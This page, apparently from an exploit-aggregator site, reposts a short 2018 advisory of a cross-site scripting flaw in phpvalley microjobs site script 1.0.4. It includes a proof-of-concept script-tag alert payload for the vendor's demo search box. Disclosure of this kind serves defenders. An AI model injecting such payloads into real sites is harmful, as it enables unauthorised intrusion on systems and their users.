Advertisement






phpvalley microjobs site script 1.0.4 Xss Vulnerability

CVE Category Price Severity
CWE-79 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2018-03-21
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018030166

Below is a copy:

phpvalley microjobs site script 1.0.4 Xss Vulnerability
| # Title    : phpvalley microjobs site script 1.0.4 Xss Vulnerability
| # Author   : indoushka
| # email    : [email protected]
| # Tested on: windows 8.1 Franais V.(Pro)
| # Vendor   : http://phpvalley.com/
==============================================================

XSs poc :

in search box http://phpvalley.com/demo/search

use payload : <script>alert(/indoushka/);</script>

Greetz :----------------------------------------------------------------------------------------
                                                                                               |
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic              |
                                                                                               |
================================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum